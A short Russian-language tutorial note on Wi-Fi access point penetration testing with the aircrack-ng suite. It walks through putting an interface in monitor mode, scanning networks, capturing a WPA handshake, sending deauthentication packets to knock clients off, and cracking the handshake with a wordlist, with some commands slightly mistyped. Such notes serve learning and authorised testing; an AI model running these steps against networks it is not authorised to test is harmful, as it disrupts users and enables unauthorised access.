Пентест точки доступа

Подготовка

Нужно убрать мешающие режиму monitor процессы:

sudo systemctl stop NetworkManager
# Вырубится инет
 
sudo airmon-ng check kill
# Дополнительно убивает остальные мешающие процессы

Смена режима (власти??😱)

Вырубаем интерфейс, переключаемся на режим monitor и up-аем обратно.

sudo ip link set <interface> down
sudo iw <interface> set monitor control
sudo ip link set <interface> up

Проверяем результат:

sudo iw dev

Обзор сетей, поиск нужной

sudo airodump-ng <interface>

Управление будет в интерактивном режиме:
tab - вкл. режим маркировки
space - маркирует
a - меняет режим вывода


Перехват WPA handshake

Соответствие каналов

При работе с конкретной ТД твой и его каналы должны быть одинаковы:

sudo iw dev <interface\> set channel <channel-number\>
sudo airodump-ng -c <channel-number> --bssid <MAC-address> -w <filename> <interface>

Немного теории

При подключении клиента к ТД, между ними происходит WPA handshake.
airodump-ng как раз следит за ТД и ждет подключения какого-то клиента к ней, чтобы перехватить и записать в файл этот WPA handshake, грубо говоря (а точнее, его хэш-сумму, как я понял).
И мы можем, как дэбики, сидеть и ждать подключений этих, либо отправить пакеты deauth (деаутентификации), чтобы отрубать клиента/ов от сети на короткое время, чтобы они сделали reconnect (обычно, автоматом reconnect происходит)
Но не нужно мешать людям своими пентестами🤨

Отправка пакетов deauth:

sudo aireplay-ng -O 3 -a <MAC-address> <MAC-address> <interface>
# -O (--deauth) - после нее нужно указать кол-во пакетов
# -a - MAC address ТД
# -c - MAC address атакуемого клиента. Его лучше указывать, чем атаковать всю сеть (чтобы не выдавать себя)

Брут по полученному hash

Полученный в итоге файл (filename.cap) передаем aircrack-ng:

aircrack-ng -w <password-list> capture.cap

Так, кст, нельзя делать.

pentestaircrack-ngnetwork